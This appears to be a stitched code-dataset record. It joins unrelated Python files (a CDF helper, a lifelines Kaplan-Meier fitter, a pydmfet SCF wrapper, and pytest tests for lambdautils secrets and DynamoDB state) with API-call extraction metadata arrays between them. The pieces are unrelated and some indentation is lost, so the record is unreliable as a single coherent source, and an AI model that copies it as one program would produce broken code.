for i in range(len(s)):
s0 = s.iloc[:i + 1]
cumulative.append(np.inner(s0.index, s0.values))
s = pd.Series(cumulative, index=s.index)
return s / s.max()
def sum_ccdf(s):
"""
Parameters:
`s`, series, whose values are the variable to be handled
Return:
a new series `s`, index of s will be X axis (number), values
will be Y axis (sum(X>=x))
"""
s = s.copy()
s = s.value_counts()
s = s.sort_index(ascending=True)
cumulative = []
for i in range(len(s)):
s1 = s.iloc[i:]
cumulative.append(np.inner(s1.index, s1.values))
return pd.Series(cumulative, index=s.index)
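# Illustrative usage (not part of the original module), on a toy sample.
if __name__ == '__main__':
    sample = pd.Series([1, 1, 2, 3, 3, 3])
    print(ccdf(sample))      # P(X >= x) for each distinct value x
    print(sum_cdf(sample))   # normalised cumulative sum of value*count up to x
    print(sum_ccdf(sample))  # sum of value*count over values >= x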
| [
"pandas.Series",
"numpy.inner"
]
| [((946, 982), 'pandas.Series', 'pd.Series', (['cumulative'], {'index': 's.index'}), '(cumulative, index=s.index)\n', (955, 982), True, 'import pandas as pd\n'), ((1463, 1499), 'pandas.Series', 'pd.Series', (['cumulative'], {'index': 's.index'}), '(cumulative, index=s.index)\n', (1472, 1499), True, 'import pandas as pd\n'), ((677, 703), 'pandas.Series', 'pd.Series', ([], {'data': 'Y', 'index': 'X'}), '(data=Y, index=X)\n', (686, 703), True, 'import pandas as pd\n'), ((907, 936), 'numpy.inner', 'np.inner', (['s0.index', 's0.values'], {}), '(s0.index, s0.values)\n', (915, 936), True, 'import numpy as np\n'), ((1421, 1450), 'numpy.inner', 'np.inner', (['s1.index', 's1.values'], {}), '(s1.index, s1.values)\n', (1429, 1450), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
import pandas as pd
from lifelines.fitters import UnivariateFitter
from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf,\
median_survival_times
from lifelines.plotting import plot_loglogs
class KaplanMeierFitter(UnivariateFitter):
"""
Class for fitting the Kaplan-Meier estimate for the survival function.
KaplanMeierFitter( alpha=0.95)
alpha: The alpha value associated with the confidence intervals.
"""
def fit(self, durations, event_observed=None, timeline=None, entry=None, label='KM_estimate',
alpha=None, left_censorship=False, ci_labels=None):
"""
Parameters:
duration: an array, or pd.Series, of length n -- duration subject was observed for
timeline: return the best estimate at the values in timelines (positively increasing)
event_observed: an array, or pd.Series, of length n -- True if the death was observed, False if the event
was lost (right-censored). Defaults all True if event_observed==None
entry: an array, or pd.Series, of length n -- relative time when a subject entered the study. This is
useful for left-truncated (not left-censored) observations. If None, all members of the population
were born at time 0.
label: a string to name the column of the estimate.
alpha: the alpha value in the confidence intervals. Overrides the initializing
alpha for this call to fit only.
left_censorship: True if durations and event_observed refer to left censorship events. Default False
ci_labels: add custom column names to the generated confidence intervals
as a length-2 list: [<lower-bound name>, <upper-bound name>]. Default: <label>_lower_<alpha>
Returns:
self, with new properties like 'survival_function_'.
"""
# if the user is interested in left-censorship, we return the cumulative_density_ instead of the survival_function_
estimate_name = 'survival_function_' if not left_censorship else 'cumulative_density_'
v = _preprocess_inputs(durations, event_observed, timeline, entry)
self.durations, self.event_observed, self.timeline, self.entry, self.event_table = v
self._label = label
alpha = alpha if alpha else self.alpha
log_survival_function, cumulative_sq_ = _additive_estimate(self.event_table, self.timeline,
self._additive_f, self._additive_var,
left_censorship)
if entry is not None:
# a serious problem with KM is that when the sample size is small and there are too few early
# truncation times, it may happen that the number of patients at risk and the number of deaths are the same.
# we adjust for this using the Breslow-Fleming-Harrington estimator
n = self.event_table.shape[0]
net_population = (self.event_table['entrance'] - self.event_table['removed']).cumsum()
if net_population.iloc[:int(n / 2)].min() == 0:
ix = net_population.iloc[:int(n / 2)].argmin()
raise StatError("""There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. Recommend BreslowFlemingHarringtonFitter.""" % ix)
# estimation
setattr(self, estimate_name, pd.DataFrame(np.exp(log_survival_function), columns=[self._label]))
self.__estimate = getattr(self, estimate_name)
self.confidence_interval_ = self._bounds(cumulative_sq_[:, None], alpha, ci_labels)
self.median_ = median_survival_times(self.__estimate, left_censorship=left_censorship)
# estimation methods
self.predict = self._predict(estimate_name, label)
self.subtract = self._subtract(estimate_name)
self.divide = self._divide(estimate_name)
# plotting functions
self.plot = self._plot_estimate(estimate_name)
setattr(self, "plot_" + estimate_name, self.plot)
self.plot_loglogs = plot_loglogs(self)
return self
def _bounds(self, cumulative_sq_, alpha, ci_labels):
# See http://courses.nus.edu.sg/course/stacar/internet/st3242/handouts/notes2.pdf
alpha2 = inv_normal_cdf((1. + alpha) / 2.)
df = pd.DataFrame(index=self.timeline)
v = np.log(self.__estimate.values)
if ci_labels is None:
ci_labels = ["%s_upper_%.2f" % (self._label, alpha), "%s_lower_%.2f" % (self._label, alpha)]
assert len(ci_labels) == 2, "ci_labels should be a length 2 array."
df[ci_labels[0]] = np.exp(-np.exp(np.log(-v) + alpha2 * np.sqrt(cumulative_sq_) / v))
df[ci_labels[1]] = np.exp(-np.exp(np.log(-v) - alpha2 * np.sqrt(cumulative_sq_) / v))
return df
def _additive_f(self, population, deaths):
np.seterr(invalid='ignore', divide='ignore')
return (np.log(population - deaths) - np.log(population))
def _additive_var(self, population, deaths):
np.seterr(divide='ignore')
return (1. * deaths / (population * (population - deaths))).replace([np.inf], 0)
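# Illustrative usage (not part of the original module): fitting the estimator
# defined above on toy right-censored data.
if __name__ == '__main__':
    durations = [2, 3, 3, 5, 7, 8, 9, 12]
    observed = [1, 1, 0, 1, 0, 1, 1, 1]
    kmf = KaplanMeierFitter()
    kmf.fit(durations, event_observed=observed, label='toy')
    print(kmf.survival_function_.head())
    print(kmf.median_)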
| [
"lifelines.utils._additive_estimate",
"numpy.sqrt",
"numpy.log",
"lifelines.utils._preprocess_inputs",
"lifelines.utils.StatError",
"numpy.exp",
"lifelines.utils.inv_normal_cdf",
"pandas.DataFrame",
"numpy.seterr",
"lifelines.utils.median_survival_times",
"lifelines.plotting.plot_loglogs"
]
| [((2218, 2280), 'lifelines.utils._preprocess_inputs', '_preprocess_inputs', (['durations', 'event_observed', 'timeline', 'entry'], {}), '(durations, event_observed, timeline, entry)\n', (2236, 2280), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((2497, 2608), 'lifelines.utils._additive_estimate', '_additive_estimate', (['self.event_table', 'self.timeline', 'self._additive_f', 'self._additive_var', 'left_censorship'], {}), '(self.event_table, self.timeline, self._additive_f, self.\n _additive_var, left_censorship)\n', (2515, 2608), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((3811, 3882), 'lifelines.utils.median_survival_times', 'median_survival_times', (['self.__estimate'], {'left_censorship': 'left_censorship'}), '(self.__estimate, left_censorship=left_censorship)\n', (3832, 3882), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((4247, 4265), 'lifelines.plotting.plot_loglogs', 'plot_loglogs', (['self'], {}), '(self)\n', (4259, 4265), False, 'from lifelines.plotting import plot_loglogs\n'), ((4451, 4486), 'lifelines.utils.inv_normal_cdf', 'inv_normal_cdf', (['((1.0 + alpha) / 2.0)'], {}), '((1.0 + alpha) / 2.0)\n', (4465, 4486), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((4498, 4531), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'self.timeline'}), '(index=self.timeline)\n', (4510, 4531), True, 'import pandas as pd\n'), ((4544, 4574), 'numpy.log', 'np.log', (['self.__estimate.values'], {}), '(self.__estimate.values)\n', (4550, 4574), True, 'import numpy as np\n'), ((5050, 5094), 'numpy.seterr', 'np.seterr', ([], {'invalid': '"""ignore"""', 'divide': '"""ignore"""'}), "(invalid='ignore', divide='ignore')\n", (5059, 5094), True, 'import numpy as np\n'), ((5219, 5245), 'numpy.seterr', 'np.seterr', ([], {'divide': '"""ignore"""'}), "(divide='ignore')\n", (5228, 5245), True, 'import numpy as np\n'), ((5111, 5138), 'numpy.log', 'np.log', (['(population - deaths)'], {}), '(population - deaths)\n', (5117, 5138), True, 'import numpy as np\n'), ((5141, 5159), 'numpy.log', 'np.log', (['population'], {}), '(population)\n', (5147, 5159), True, 'import numpy as np\n'), ((3364, 3519), 'lifelines.utils.StatError', 'StatError', (["('There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. Recommend BreslowFlemingHarringtonFitter.'\n % ix)"], {}), "(\n 'There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. 
Recommend BreslowFlemingHarringtonFitter.'\n % ix)\n", (3373, 3519), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((3586, 3615), 'numpy.exp', 'np.exp', (['log_survival_function'], {}), '(log_survival_function)\n', (3592, 3615), True, 'import numpy as np\n'), ((4830, 4840), 'numpy.log', 'np.log', (['(-v)'], {}), '(-v)\n', (4836, 4840), True, 'import numpy as np\n'), ((4924, 4934), 'numpy.log', 'np.log', (['(-v)'], {}), '(-v)\n', (4930, 4934), True, 'import numpy as np\n'), ((4852, 4875), 'numpy.sqrt', 'np.sqrt', (['cumulative_sq_'], {}), '(cumulative_sq_)\n', (4859, 4875), True, 'import numpy as np\n'), ((4946, 4969), 'numpy.sqrt', 'np.sqrt', (['cumulative_sq_'], {}), '(cumulative_sq_)\n', (4953, 4969), True, 'import numpy as np\n')] |
import numpy as np
from pydmfet import tools
from .fermi import find_efermi, entropy_corr
from pyscf import ao2mo, gto, scf, dft, lib
from pydmfet.qcwrap import fermi
import time
from functools import reduce
def scf_oei( OEI, Norb, Nelec, smear_sigma = 0.0):
OEI = 0.5*(OEI.T + OEI)
eigenvals, eigenvecs = np.linalg.eigh( OEI )
idx = np.argmax(abs(eigenvecs), axis=0)
eigenvecs[:,eigenvecs[ idx, np.arange(len(eigenvals)) ]<0] *= -1
Nocc = Nelec//2 #closed shell
e_homo = eigenvals[Nocc-1]
e_lumo = eigenvals[Nocc]
print ('HOMO: ', e_homo, 'LUMO: ', e_lumo)
print ("mo_energy:")
print (eigenvals[:Nocc+5])
e_fermi = e_homo
mo_occ = np.zeros((Norb))
if(smear_sigma < 1e-8): #T=0
mo_occ[:Nocc] = 1.0
else: #finite T
e_fermi, mo_occ = find_efermi(eigenvals, smear_sigma, Nocc, Norb)
mo_occ*=2.0 #closed shell
Ne_error = np.sum(mo_occ) - Nelec
if(Ne_error > 1e-8):
print ('Ne error = ', Ne_error)
print ("fermi energy: ", e_fermi)
np.set_printoptions(precision=4)
flag = mo_occ > 1e-4
print (mo_occ[flag])
np.set_printoptions()
RDM1 = reduce(np.dot, (eigenvecs, np.diag(mo_occ), eigenvecs.T))
RDM1 = (RDM1.T + RDM1)/2.0
energy = np.trace(np.dot(RDM1,OEI))
es = entropy_corr(mo_occ, smear_sigma)
print ('entropy correction: ', es)
energy += es
print ('e_tot = ', energy)
return ( energy, RDM1, eigenvecs, eigenvals, mo_occ )
# The following is deprecated!
class scf_pyscf():
'''
subspace scf
wrapper for scf module of pyscf
'''
def __init__(self, Ne, Norb, mol=None, oei=None, tei=None, ovlp=1, dm0=None, coredm=0, ao2sub=None, mf_method='HF'):
self.mol = mol
self.Ne = Ne
self.Norb = Norb
self.method = mf_method
self.oei = oei
self.tei = tei
self.ovlp = ovlp
self.dm0 = dm0
self.coredm = coredm
self.ao2sub = ao2sub
self.method = mf_method.lower()
self.mf = None
if(self.mol is None):
#what molecule does not matter
self.mol = gto.Mole()
self.mol.build( verbose=0 )
self.mol.atom.append(('C', (0, 0, 0)))
#adjust number of electrons
self.mol.nelectron = Ne
if(self.tei is not None):
self.mol.incore_anyway = True
if(self.method == 'hf'):
self.mf = scf.RHF(self.mol)
self.prep_rhf()
else:
self.mf = scf.RKS(self.mol)
self.mf.xc = self.method
self.prep_rhf()
self.prep_rks()
self.elec_energy = 0.0
self.rdm1 = None
self.mo_coeff = None
self.mo_energy = None
self.mo_occ = None
def prep_rhf(self):
if(self.ovlp == 1):
self.mf.get_ovlp = lambda *args: np.eye( self.Norb )
if(self.oei is not None):
self.mf.get_hcore = lambda *args: self.oei
if(self.tei is not None):
self.mf._eri = ao2mo.restore(8, self.tei, self.Norb)
def prep_rks(self):
if(self.ao2sub is None):
return
#overload dft.rks.get_veff if necessary
self.mf.get_veff = get_veff_rks_decorator(self.ao2sub, self.coredm)
def kernel(self):
self.mf.kernel(self.dm0)
if ( self.mf.converged == False ):
raise Exception("scf not converged!")
rdm1 = self.mf.make_rdm1()
self.rdm1 = 0.5*(rdm1.T + rdm1)
self.elec_energy = self.mf.energy_elec(self.rdm1)[0]
self.mo_coeff = self.mf.mo_coeff
self.mo_energy = self.mf.mo_energy
self.mo_occ = self.mf.mo_occ
def get_veff_rks_decorator(ao2sub, coredm):
def get_veff(ks, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
if mol is None: mol = ks.mol
if dm is None: dm = ks.make_rdm1()
dm_sub = np.asarray(dm) + coredm
dm_ao = tools.dm_sub2ao(dm_sub, ao2sub)
if hasattr(dm, 'mo_coeff'):
mo_coeff_sub = dm.mo_coeff
mo_occ_sub = dm.mo_occ
mo_coeff_ao = tools.mo_sub2ao(mo_coeff_sub, ao2sub)
mo_occ_ao = mo_occ_sub
dm_ao = lib.tag_array(dm_ao, mo_coeff=mo_coeff_ao, mo_occ=mo_occ_ao)
n, exc, vxc_ao, hyb = get_vxc(ks, mol, dm_ao)
vxc = tools.op_ao2sub(vxc_ao, ao2sub)
vj = None
vk = None
if abs(hyb) < 1e-10:
if (ks._eri is None and ks.direct_scf and
getattr(vhf_last, 'vj', None) is not None):
ddm = np.asarray(dm) - np.asarray(dm_last)
vj = ks.get_jk(mol, ddm, hermi)[0]
vj += vhf_last.vj
else:
vj = ks.get_jk(mol, dm, hermi)[0]
vxc += vj
else:
if (ks._eri is None and ks.direct_scf and
getattr(vhf_last, 'vk', None) is not None):
ddm = np.asarray(dm) - np.asarray(dm_last)
vj, vk = ks.get_jk(mol, ddm, hermi)
vj += vhf_last.vj
vk += vhf_last.vk
else:
vj, vk = ks.get_jk(mol, dm, hermi)
vxc += vj - vk * (hyb * .5)
exc -= np.einsum('ij,ji', dm, vk) * .5 * hyb*.5
ecoul = np.einsum('ij,ji', dm, vj) * .5
vxc = lib.tag_array(vxc, ecoul=ecoul, exc=exc, vj=vj, vk=vk)
return vxc
return get_veff
def get_vxc(ks, mol, dm, hermi=1):
ground_state = (isinstance(dm, np.ndarray) and dm.ndim == 2)
if(not ground_state):
raise Exception("fatal error")
if ks.grids.coords is None:
ks.grids.build(with_non0tab=True)
if ks.small_rho_cutoff > 1e-20 and ground_state:
# Filter grids the first time setup grids
t0 = (time.clock(), time.time())
ks.grids = dft.rks.prune_small_rho_grids_(ks, mol, dm, ks.grids)
t1 = tools.timer("prune grid",t0)
if hermi == 2: # because rho = 0
n, exc, vxc = 0, 0, 0
else:
n, exc, vxc = ks._numint.nr_rks(mol, ks.grids, ks.xc, dm)
hyb = ks._numint.hybrid_coeff(ks.xc, spin=mol.spin)
return n, exc, vxc, hyb
'''
def rhf(mol, OEI, TEI, Norb, Nelec, OneDM0=None ):
# Get the RHF solution
OEI = 0.5*(OEI.T + OEI)
#mol = gto.Mole()
#mol.max_memory = 8000
#mol.build( verbose=0 )
#mol.atom.append(('C', (0, 0, 0)))
mol.nelectron = Nelec
mol.incore_anyway = True
mf = pyscf_scf.RHF( mol )
mf.get_hcore = lambda *args: OEI
mf.get_ovlp = lambda *args: np.eye( Norb )
mf._eri = ao2mo.restore(8, TEI, Norb)
mf.max_cycle = 100
#mf.conv_tol = 1e-8
#adiis = pyscf_scf.diis.ADIIS()
#mf.diis = adiis
#mf.verbose = 5
mf.kernel(OneDM0)
if ( mf.converged == False ):
#RDM1 = mf.make_rdm1()
#cdiis = pyscf_scf.diis.SCF_DIIS()
#mf.diis = cdiis
#mf.max_cycle = 200
#mf.kernel(RDM1)
if ( mf.converged == False ):
raise Exception(" rhf not converged!")
return mf
def rks(mol, OEI, TEI, Norb, Nelec, xcfunc, OneDM0=None ):
# Get the RKS solution
OEI = 0.5*(OEI.T + OEI)
#mol = gto.Mole()
#mol.build( verbose=5 )
#mol.atom.append(('C', (0, 0, 0)))
mol.nelectron = Nelec
# mol.incore_anyway = True
mf = pyscf_scf.RKS( mol )
mf.xc = xcfunc.lower()
# mf.get_hcore = lambda *args: OEI
# mf.get_ovlp = lambda *args: np.eye( Norb )
# mf._eri = ao2mo.restore(8, TEI, Norb)
OneDM0 = None
mf.kernel( OneDM0 )
if ( mf.converged == False ):
raise Exception(" rks not converged!")
return mf
def scf(mol, OEI, TEI, Norb, Nelec, OneDM0=None, mf_method = 'HF' ):
# Get the mean-field solution
if(mf_method.lower() == 'hf'):
mf = rhf(mol, OEI, TEI, Norb, Nelec, OneDM0 )
else:
mf = rks(mol, OEI, TEI, Norb, Nelec, mf_method ,OneDM0 )
RDM1 = mf.make_rdm1()
RDM1 = 0.5*(RDM1.T + RDM1)
mo_coeff = mf.mo_coeff
mo_energy = mf.mo_energy
energy = mf.energy_elec(RDM1)[0]
mo = np.zeros([Norb,Norb+1],dtype=float)
mo[:,:-1] = mo_coeff
mo[:,-1] = mo_energy
#print "mo energy"
#print mf.mo_energy
#tools.MatPrint(mf.get_fock(),"fock")
#JK = mf.get_veff(None, dm=RDM1)
#tools.MatPrint(JK,"JK")
#tools.MatPrint(np.dot(mf.get_fock(), mf.mo_coeff),"test")
#tools.MatPrint(mf.mo_coeff,"mo_coeff")
return (energy, RDM1, mo)
'''
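# Illustrative usage (not part of the original module): a closed-shell
# diagonalization of a small model one-electron Hamiltonian with scf_oei.
# The matrix entries are arbitrary; only hermiticity matters.  Assumes the
# package's fermi helpers (entropy_corr) are importable as above.
def _example_scf_oei():
    norb, nelec = 4, 4
    h = np.diag([-1.0, -0.5, 0.2, 0.8])
    h[0, 1] = h[1, 0] = -0.1
    energy, rdm1, mo_coeff, mo_energy, mo_occ = scf_oei(h, norb, nelec, smear_sigma=0.0)
    return energy, rdm1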
| [
"time.clock",
"numpy.einsum",
"pyscf.ao2mo.restore",
"pydmfet.tools.op_ao2sub",
"pydmfet.tools.timer",
"numpy.asarray",
"numpy.dot",
"pydmfet.tools.dm_sub2ao",
"numpy.linalg.eigh",
"pyscf.dft.rks.prune_small_rho_grids_",
"pyscf.scf.RKS",
"numpy.eye",
"time.time",
"numpy.set_printoptions",
"pyscf.gto.Mole",
"pyscf.lib.tag_array",
"numpy.diag",
"numpy.sum",
"numpy.zeros",
"pyscf.scf.RHF",
"pydmfet.tools.mo_sub2ao"
]
| [((316, 335), 'numpy.linalg.eigh', 'np.linalg.eigh', (['OEI'], {}), '(OEI)\n', (330, 335), True, 'import numpy as np\n'), ((686, 700), 'numpy.zeros', 'np.zeros', (['Norb'], {}), '(Norb)\n', (694, 700), True, 'import numpy as np\n'), ((1036, 1068), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(4)'}), '(precision=4)\n', (1055, 1068), True, 'import numpy as np\n'), ((1123, 1144), 'numpy.set_printoptions', 'np.set_printoptions', ([], {}), '()\n', (1142, 1144), True, 'import numpy as np\n'), ((906, 920), 'numpy.sum', 'np.sum', (['mo_occ'], {}), '(mo_occ)\n', (912, 920), True, 'import numpy as np\n'), ((1270, 1287), 'numpy.dot', 'np.dot', (['RDM1', 'OEI'], {}), '(RDM1, OEI)\n', (1276, 1287), True, 'import numpy as np\n'), ((3972, 4003), 'pydmfet.tools.dm_sub2ao', 'tools.dm_sub2ao', (['dm_sub', 'ao2sub'], {}), '(dm_sub, ao2sub)\n', (3987, 4003), False, 'from pydmfet import tools\n'), ((4365, 4396), 'pydmfet.tools.op_ao2sub', 'tools.op_ao2sub', (['vxc_ao', 'ao2sub'], {}), '(vxc_ao, ao2sub)\n', (4380, 4396), False, 'from pydmfet import tools\n'), ((5363, 5417), 'pyscf.lib.tag_array', 'lib.tag_array', (['vxc'], {'ecoul': 'ecoul', 'exc': 'exc', 'vj': 'vj', 'vk': 'vk'}), '(vxc, ecoul=ecoul, exc=exc, vj=vj, vk=vk)\n', (5376, 5417), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((1185, 1200), 'numpy.diag', 'np.diag', (['mo_occ'], {}), '(mo_occ)\n', (1192, 1200), True, 'import numpy as np\n'), ((2149, 2159), 'pyscf.gto.Mole', 'gto.Mole', ([], {}), '()\n', (2157, 2159), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((2453, 2470), 'pyscf.scf.RHF', 'scf.RHF', (['self.mol'], {}), '(self.mol)\n', (2460, 2470), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((2535, 2552), 'pyscf.scf.RKS', 'scf.RKS', (['self.mol'], {}), '(self.mol)\n', (2542, 2552), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((3058, 3095), 'pyscf.ao2mo.restore', 'ao2mo.restore', (['(8)', 'self.tei', 'self.Norb'], {}), '(8, self.tei, self.Norb)\n', (3071, 3095), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((3932, 3946), 'numpy.asarray', 'np.asarray', (['dm'], {}), '(dm)\n', (3942, 3946), True, 'import numpy as np\n'), ((4142, 4179), 'pydmfet.tools.mo_sub2ao', 'tools.mo_sub2ao', (['mo_coeff_sub', 'ao2sub'], {}), '(mo_coeff_sub, ao2sub)\n', (4157, 4179), False, 'from pydmfet import tools\n'), ((4235, 4295), 'pyscf.lib.tag_array', 'lib.tag_array', (['dm_ao'], {'mo_coeff': 'mo_coeff_ao', 'mo_occ': 'mo_occ_ao'}), '(dm_ao, mo_coeff=mo_coeff_ao, mo_occ=mo_occ_ao)\n', (4248, 4295), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((5316, 5342), 'numpy.einsum', 'np.einsum', (['"""ij,ji"""', 'dm', 'vj'], {}), "('ij,ji', dm, vj)\n", (5325, 5342), True, 'import numpy as np\n'), ((5884, 5937), 'pyscf.dft.rks.prune_small_rho_grids_', 'dft.rks.prune_small_rho_grids_', (['ks', 'mol', 'dm', 'ks.grids'], {}), '(ks, mol, dm, ks.grids)\n', (5914, 5937), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((5955, 5984), 'pydmfet.tools.timer', 'tools.timer', (['"""prune grid"""', 't0'], {}), "('prune grid', t0)\n", (5966, 5984), False, 'from pydmfet import tools\n'), ((2888, 2905), 'numpy.eye', 'np.eye', (['self.Norb'], {}), '(self.Norb)\n', (2894, 2905), True, 'import numpy as np\n'), ((5834, 5846), 'time.clock', 'time.clock', ([], {}), '()\n', (5844, 5846), False, 'import time\n'), ((5848, 5859), 'time.time', 'time.time', ([], {}), '()\n', (5857, 5859), False, 'import time\n'), ((5258, 5284), 'numpy.einsum', 'np.einsum', (['"""ij,ji"""', 'dm', 'vk'], {}), "('ij,ji', 
dm, vk)\n", (5267, 5284), True, 'import numpy as np\n')] |
"""Unit tests."""
import inspect
import json
from mock import Mock
import os
import sys
import uuid
import pytest
# Add the lambda directory to the python library search path
lambda_dir = os.path.join(
os.path.dirname(inspect.getfile(inspect.currentframe())), '..')
sys.path.append(lambda_dir)
import lambdautils.utils
@pytest.mark.parametrize(
"key,environment,stage,namespace,table,nkey", [
("k", "e", "s", None, "e-s-secrets", "k"),
("k", "e", None, None, "e-dummystage-secrets", "k"),
("k", "e", None, "n", "e-dummystage-secrets", "n:k"),
("k", "e", "s", "n", "e-s-secrets", "n:k")])
def test_get_secret_from_vault(key, environment, stage, namespace, table, nkey,
boto3_resource, boto3_client, monkeypatch):
"""Gets a secret from the DynamoDB secrets vault."""
# Call to the DynamoDB client to retrieve the encrypted secret
monkeypatch.setattr("boto3.resource", boto3_resource)
monkeypatch.setattr("boto3.client", boto3_client)
secret = lambdautils.utils.get_secret(key,
namespace=namespace,
environment=environment,
stage=stage)
assert secret == "dummy"
boto3_client("dynamodb").get_item.assert_called_with(
TableName=table,
Key={"id": {"S": nkey}})
# Call to the KMS client to decrypt the secret
boto3_client('kms').decrypt.assert_called_with(CiphertextBlob="encrypted")
def test_get_secret_from_env(monkeypatch):
"""Get a secret from an (encrypted) environment variable."""
key = str(uuid.uuid4()).replace('-', '.')
value = str(uuid.uuid4())
monkeypatch.setenv(key.replace('.', '_').upper(), value)
secret = lambdautils.utils.get_secret(key)
assert secret == value
def test_get_setting(monkeypatch):
"""Should be an alias for get_secret."""
resp = str(uuid.uuid4())
arg = str(uuid.uuid4())
kwarg = str(uuid.uuid4())
get_secret = Mock(return_value=resp)
monkeypatch.setattr("lambdautils.state.get_secret", get_secret)
resp2 = lambdautils.state.get_setting(arg, kwarg=kwarg)
assert resp2 == resp
get_secret.assert_called_with(arg, kwarg=kwarg)
@pytest.mark.parametrize(
"key,environment,layer,stage,shard_id,namespace,table,consistent,nkey", [
("k", "e", "l", "s", None, None, "e-l-s-state", False, "k"),
("k", "e", "l", "s", None, "n", "e-l-s-state", False, "n:k"),
("k", "e", "l", "s", "s-012", "n", "e-l-s-state", True, "s-012:n:k"),
("k", "e", "l", "s", "s-0001", None, "e-l-s-state", True, "s-0001:k")])
def test_get_state(boto3_resource, monkeypatch, key, environment, layer,
stage, shard_id, namespace, table, consistent, nkey):
"""Get a state value from DynamoDB."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.get_state(key, environment=environment, layer=layer,
stage=stage, shard_id=shard_id,
namespace=namespace,
consistent=consistent)
boto3_resource("dynamodb").Table.assert_called_with(table)
if consistent is None:
# The default setting: use consistent reads
consistent = True
boto3_resource("dynamodb").Table().get_item.assert_called_with(
Key={"id": nkey}, ConsistentRead=consistent)
def test_no_state_table(boto3_resource, monkeypatch):
"""Test accessing state variable without having a state table."""
monkeypatch.setattr("boto3.resource", boto3_resource)
monkeypatch.delenv("HUMILIS_ENVIRONMENT")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.set_state("sample_state_key", "sample_state_value")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.delete_state("sample_state_key")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.get_state("sample_state_key")
@pytest.mark.parametrize(
"key,value,environment,layer,stage,shard_id,namespace,table,nkey", [
("k", "v", "e", "l", "s", None, None, "e-l-s-state", "k"),
("k", "v", "e", "l", "s", None, "n", "e-l-s-state", "n:k"),
("k", "v", "e", "l", "s", "s1", "n", "e-l-s-state", "s1:n:k"),
("k", "v", "e", "l", "s", "s2", None, "e-l-s-state", "s2:k")])
def test_set_state(boto3_resource, monkeypatch, key, value, environment, layer,
stage, shard_id, namespace, table, nkey):
"""Tests setting a state variable."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.set_state(key, value, environment=environment,
layer=layer, stage=stage, shard_id=shard_id,
namespace=namespace)
boto3_resource("dynamodb").Table.assert_called_with(table)
boto3_resource("dynamodb").Table().put_item.assert_called_with(
Item={"id": nkey, "value": json.dumps(value)})
@pytest.mark.parametrize(
"key,environment,layer,stage,shard_id,namespace,table,nkey", [
("k", "e", "l", "s", None, None, "e-l-s-state", "k"),
("k", "e", "l", "s", None, "n", "e-l-s-state", "n:k"),
("k", "e", "l", "s", "s1", "n", "e-l-s-state", "s1:n:k"),
("k", "e", "l", "s", "s2", None, "e-l-s-state", "s2:k")])
def test_delete_state(boto3_resource, monkeypatch, key, environment,
layer, stage, shard_id, namespace, table, nkey):
"""Tests setting a state variable."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.delete_state(key, environment=environment,
layer=layer, stage=stage, shard_id=shard_id,
namespace=namespace)
boto3_resource("dynamodb").Table.assert_called_with(table)
boto3_resource("dynamodb").Table().delete_item.assert_called_with(
Key={"id": nkey})
def test_sentry_monitor_bad_client(boto3_client, raven_client, context,
monkeypatch):
"""Test that sentry_monitor handles raven client errors gracefully."""
class ClientError(Exception):
pass
def raise_error(dsn):
raise ClientError
monkeypatch.setattr("raven.Client", Mock(side_effect=raise_error))
monkeypatch.setattr("boto3.client", boto3_client)
@lambdautils.utils.sentry_monitor(environment="dummyenv",
stage="dummystage")
def lambda_handler(event, context):
pass
lambda_handler(None, context)
raven_client.captureException.assert_not_called()
@pytest.mark.parametrize(
"kstream, fstream, rcalls, kcalls, fcalls, ev", [
("a", "b", 1, 0, 0, {"Records": [{}]}),
(None, "b", 1, 0, 0, {"Records": [{}]}),
(None, None, 1, 0, 0, None),
(None, None, 1, 0, 0, None),
("a", "b", 1, 0, 0, None),
("a", None, 1, 0, 0, None)])
def test_sentry_monitor_exception(
kstream, fstream, rcalls, kcalls, fcalls, ev,
boto3_client, raven_client, context, kinesis_event, monkeypatch):
"""Tests the sentry_monitor decorator when throwing an exception and
lacking an error stream where to dump the errors."""
if ev is None:
# Default to a Kinesis event
ev = kinesis_event
monkeypatch.setattr("boto3.client", boto3_client)
monkeypatch.setattr("raven.Client", Mock(return_value=raven_client))
monkeypatch.setattr("lambdautils.monitor.SentryHandler", Mock())
monkeypatch.setattr("lambdautils.utils.get_secret",
Mock(return_value="dummydsn"))
error_stream = {
"kinesis_stream": kstream,
"firehose_delivery_stream": fstream}
@lambdautils.utils.sentry_monitor(error_stream=error_stream)
def lambda_handler(event, context):
"""Raise an error."""
raise KeyError
with pytest.raises(KeyError):
lambda_handler(ev, context)
# Should have captured only 1 error:
# * The original KeyError
assert raven_client.captureException.call_count == rcalls
# And should have send the events to the Kinesis and FH error streams
assert boto3_client("kinesis").put_records.call_count == kcalls
assert boto3_client("firehose").put_record_batch.call_count == fcalls
